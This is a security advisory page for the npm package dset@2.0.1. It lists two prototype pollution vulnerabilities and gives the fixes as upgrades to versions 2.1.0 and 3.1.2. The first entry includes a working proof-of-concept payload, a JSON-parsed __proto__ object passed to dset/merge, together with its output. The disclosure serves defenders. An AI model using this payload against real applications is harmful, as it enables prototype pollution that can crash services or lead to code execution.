dset@2.0.1 vulnerabilities

A tiny (194B) utility for safely writing deep Object values~!

Direct Vulnerabilities

Known vulnerabilities in the dset package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • M
Prototype Pollution

dset is an A tiny (161B) utility for safely writing deep Object values~!

Affected versions of this package are vulnerable to Prototype Pollution via 'dset/merge' mode, as the dset function checks for prototype pollution by validating if the top-level path contains __proto__, constructor or protorype. By crafting a malicious object, it is possible to bypass this check and achieve prototype pollution.

PoC:

// poc.js contains:

const {dset} = require("dset/merge")

var a = {b:{c:1}}

console.log("a.polluted:",a.polluted)
console.log("{}.polluted:",({}).polluted)

dset(a,"b", JSON.parse('{"__proto__":{"polluted":"Yes!"}}') ) //Needs to craft payload with JSON.parse to keep the object key __proto__

console.log("a.polluted:",a.polluted)
console.log("{}.polluted:",({}).polluted)

// Running node poc.js give the output:

a.polluted: undefined
{}.polluted: undefined
a.polluted: Yes!
{}.polluted: Yes!

How to fix Prototype Pollution?

Upgrade dset to version 3.1.2 or higher.

<3.1.2
  • H
Prototype Pollution

dset is an A tiny (161B) utility for safely writing deep Object values~!

Affected versions of this package are vulnerable to Prototype Pollution. It allows an attacker to cause a denial of service and may lead to remote code execution.

How to fix Prototype Pollution?

Upgrade dset to version 2.1.0 or higher.

>=1.0.0 <2.1.0